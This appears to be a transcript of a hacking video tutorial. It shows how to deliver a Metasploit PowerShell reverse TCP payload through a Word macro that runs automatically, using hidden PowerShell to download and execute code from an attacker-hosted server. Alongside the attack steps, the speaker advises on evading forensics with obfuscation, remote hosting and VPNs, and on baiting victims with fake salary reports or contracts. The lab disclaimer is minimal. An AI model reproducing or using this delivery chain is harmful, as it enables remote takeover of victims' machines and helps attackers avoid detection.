Hello guys, good morning, good afternoon, good evening. How are you guys doing? I hope you guys are fine. I hope you guys are doing okay. So today we are this is a will be a very nice video because we are going to learn some technique to deliver a payload or to deliver a malware or to deliver anything we want in a target computer or a specific computer from someone you know. Anyway, we will deliver something into a target computer and hack that computer. All right. So this is just for education purposes. Okay. This I have my environment for practicing for testing. So we are going to use macro downloader to do that. Okay. So pretty much this works like that. Let me show you guys. We're going to create a payload with Venom, MSF Venom, and then we are going to create a macro downloader to download a software, malicious code, okay, and then we are going to get access. You guys see here, I just opened the Word, and then I got a access into, and this is my real machine, this one. All right, this is not even the target. Here's the gateway IP address. So let's start. First I'm going to exit. All right, exit, and well, let me close this chat right here, and let me delete this file here, and I'm going here to my target machine, and I'm going to delete this also. Okay, and let's delete that. This is the Zabbix file. Alright, this one too. I'm going to delete everything. Okay, so first thing, we have to create a payload, but just a second. CD, right, and then CD var. Alright, so sudo test, call it. Okay, perfect. Let me do something here before we do that. Where's the history? And then we want to open and save it. Alright, we're going to start from screen or from clean terminal. Right, this is like never was used before now. So first thing, we have to create a payload. Alright, MSF Venom, and then P for payload. What payload we are going to use will be like a PowerShell payload. Okay, so it's going to be Windows 64 bits and then PowerShell underscore reverse underscore and then TCP. lhost. The lhost is my Kali, my attacker machine. So I'm using this Kali Linux, and I have two NIC here, network interface card. Alright, so ifconfig, I have one of here, 38, and then I have the 80 that is 139. So 192.168.79.139. L port will be the port we are going to listen this payload. Alright, so it's going to be 443, and then now the O for output. You can give any name you want. Right, I already actually have, so rm windows.txt. Okay, Control L. I'm going to give the name windows.txt. Okay, so I'm going to press enter, and it's going to be created or payload. Okay, so give it just some few minutes. Perfect. The payload was created. We can get a cat windows.txt. So here is the payload in PowerShell. Well, we have to remove this header, right? Here we have to remove this content and then just let the PowerShell. Or we could copy here also. So nano windows.txt. I'm going to press del to delete everything before PowerShell, of course. Alright, so Ctrl X, Y, and press enter. So just to check about it, I'm going to open again here on mousepad. Alright, so open it and just create one more. I'm going to Ctrl S and it's saved. So now I'm going to move into the web server. I have a Apache already running. Alright, if you want to start and you don't know how to do that, it's sudo systemctl system control start Apache 2. Right, so and then we started Apache. Right, so sudo cp windows.txt var html. Done. We copied the Windows.txt to our Kali web server. So the thing here is we are hosting this file on our personal host, on our personal web server that is on attacker machine. But it works also if you host on the internet. If you have a domain name, or if you have a web server, or CNC command and control server, a remote server, anywhere you want to host it, will work perfectly. Alright, so just for you guys to check it out and you guys to see how it works, I'm going to open the browser 192. It's already here, of course, windows.txt. Here it's the payload. Alright, so first I'm going to start a listener. So msf console, let's start an msf console. Perfect. Now we are going to use a multi-handler, so use exploit multi-handler. Okay, perfect. We are using the exploit multi-handler. So set payload Windows x64 PowerShell reverse TCP. Right, so press enter. We are using the reverse shell is the same one we use to create our payload with MSF Venom. So let's check the options. Show options, and then here we are going to change few things. First, set lhost 192.168.79.139 and then set lport 443. Now we are going to set the exit on session as false. Right, set exit on session false. Alright, now we are going to start to exploit, and we're going to wait with the listener. Exploit J. Alright, well, we started already, so let's take this code here, copy, I'm going just to show you guys that will work nicely. Okay, so let's create a new file here. Bat poll. Yes, it's a empty file, right? And remembering that it's a lab, all right? I have computers, I have my own network, so I'm not hacking into anybody's computer. It's on my local network, all right? Control S, and then all right. So I'm going to click. Let's see here. So we got the connection, but this is not the main part. All right, this is just show you guys that the payload is working. So now we are going to configure the another part. So let me open my Word editor. Let me create a new document. Let me try to open it on the same size of this page. Yeah. Okay. So now we are going to open the Word or Excel or any other Office document you want, and then we are going to create a macro. So here on macro we select document because we want to run the script on this document, only this document. So I'm just say as power, right? And then I'm going to create a file. Here is the VBA. It's very nice language, all right? Visual Basic for applications. I learned Visual Basic 6 in very old times. People that are older knows what I'm talking about. So let's do it. Now we are going to invoke the shell to open. This shell is going to be the PowerShell, all right? So PowerShell. First, let's change. Okay, let's change this to auto open. That's going to run automatically. All right. So PowerShell.exe. W for window. How we want to open this. The target, the person that's going to open this document is going to see the terminal opening or not. No. So hidden and then non-interactive. All right. So now double quotes EEX. This is very nice because PowerShell has this kind of crazy thing that he can download anything, all right, from the internet, so without any kind of problem. So now 112, and then now we are saying like a new object, and then now we have to invoke the web client drive. Like when we use a database in Java, we invoke the object from MySQL or SQL Server or any other. And when we work with scripts, it's the same. We invoke them like web client, okay, dot download string. Here we are going to say, hey, open the PowerShell. The PowerShell will invoke this client that is going to invoke the web client. Can be the standard web client, doesn't matter. Alright, like the standard one is going to be on my computer, Edge. On the target's computer is going to be Edge, but there could be Firefox, Opera, Chrome, or any other. Alright, so now we are going to say, alright, it's going to download this string. What string and from where? HTTP, right? 192.168.79.139/windows.txt, then close. Perfect. Now we have to finish this and close here. Oh, it's missing just one here. Perfect. What now? Well, we didn't finish yet. Alright, so let me just copy here. I, it's normal every time a person saves, so it's sometimes even crazy. So, well, here and then here I'm just going to call auto open. That's going to call the function auto open, and here I'm going to rename and auto open, and I'm going to rename here to workbook, that if you want to work with Excel workbook, that's going to work also on Excel. So it's pretty much that, but I recommend you guys one thing. When you do something like that, that's going to be exposed to the target or to the forensic team, hide this, alright, or make some kind of obfuscation on it. Use base 64, or if you are going to do some shit with your life, to be very honest, use a remote server or just hosting somewhere else, somewhere. Okay, just rent some hosting company, or well, I'm not going to give it any kind of inspiration or any kind of advice, but if you don't want to be get caught, just hide this. Alright, so use your best technique, find something on internet, or just host it in somewhere else that is not your own PC, on your own network, because this is the string just to call this file over here through the browser, and then the browser will execute the file without downloading anything. The file, this script is not going to download the executable, it's going to execute the txt file from the browser, so there's not going to be downloaded a virus to the computer or a payload to the computer. It's going to be executed through the browser. Alright, so I'm going to save this and then document. Alright, so a very important advice: save as 97 2003 Word document. Okay, I'm going to use on my desktop. Okay, I'll save it. Perfect, it's done. Well, I will back here. Let me open my folder here, my desktop folder. I'm going to copy from my real computer, my physical machine, to the Kali machine over here. Here is it. So now I'm going to open the terminal again, and then we are going to just cd desktop, right, sudo cp document dot doc to var www html to be downloaded or to be available for download. As I told you guys, don't really care what kind of server are you going to use, where are you going to use. So let's just check the sessions here. Okay, we have one session here. So now, how this is possible? Let's say we send this file through email. That's not even, I mean, there's a lot of security nowadays. Or what if we make it available in a website to download with like a salary report or a contract or a personal pictures, you know, any kind of file you want using Word document or Excel. When the target, let me delete that. When my target or when the victim will open or will navigate to get this information, they're going to do something like that. They're going to the website and they're going to click on the link to download. Alright, so document, let me see, .doc. And well, it's downloaded. I'm not going to execute right here. I'm going to open it here on documents and then I will execute. So in this moment, well, there is actually, let's be very honest, people don't give a fuck about this. Normally they want to see, alright, if the text is empty, and then they're going to be fucking enable this. They will enable this to get access, alright, to whatever that has inside this document. So let's check something. We just got a section, okay, so sections L here, dev2, alright, the IP is 132. Just to be sure that I'm not lying and that it's working, it's still working pretty much actually. IP config, so here 132. Alright, so it is this computer, and opened a PowerShell on the folder downloads. We can verify it right here. Sections I and then 2. So we are in documents actually. Why? Anyway, we are in documents, and well, that is what really matters. Okay. Now we can just ls, right, cd cd desktop ls, and here is a link cd downloads. Okay. So ls here document. Now why I'm telling you guys to hide very well the string where you put the address, your IP or the hosting you are using, because like that, cat document .doc. The file itself, it's empty, right? There is nothing, it's empty, okay? But there's some part that's going to call the macro that it is inside the document, and here it is the attacker IP address. You guys see? So this is a very big problem for someone who is attacking. You have to use like base 64, okay, encryption, or try any other technique of obfuscation, but you have to do it. Okay, so why I'm showing you guys this? Because in the next videos I'm going to talk about obfuscation and how to build a RAT, remote access tool, it in Python, alright, or in PHP with C#. I don't know exactly yet, but probably it's going to be one of these two. And then we are going to build to create a command and control, alright. So we are going to have a panel that we are going to receive multiple connections. So in this panel we can check everything: keyloggers, computer name, we can build a malware, botnets, we can do a lot of things we're going to do. So for now is it, alright. And this is a very nice kind of delivery because it's still working pretty much actually. Okay, let's try again. I closed the session over there. It's not going to work. I closed the session. So anyway, it's a very nice kind of delivery. If you want to deliver a payload, or if you want to hack into a computer, this is one of the best ways. But remember, hide it. hide this file, hide your IP address, sorry. And another thing, always use a VPN. It's not going to make you 100% safe, alright, but it's for your own safety, and it's going to keep you safe one more layer. Okay, so use VPN, use Tor or wherever you want. I don't use on my videos because it's my own lab, but when I work, or well, in my past, I had a VIP72 and ExpressVPN because they had, or I think they still have, the option for port forwarding. Okay, and you guys know what I mean. So thank you guys for watching this video. I hope you guys like it, and if you like it, just give me a like, subscribe to my channel, and share with your friends. There's no costs, alright? So see you guys on the next video.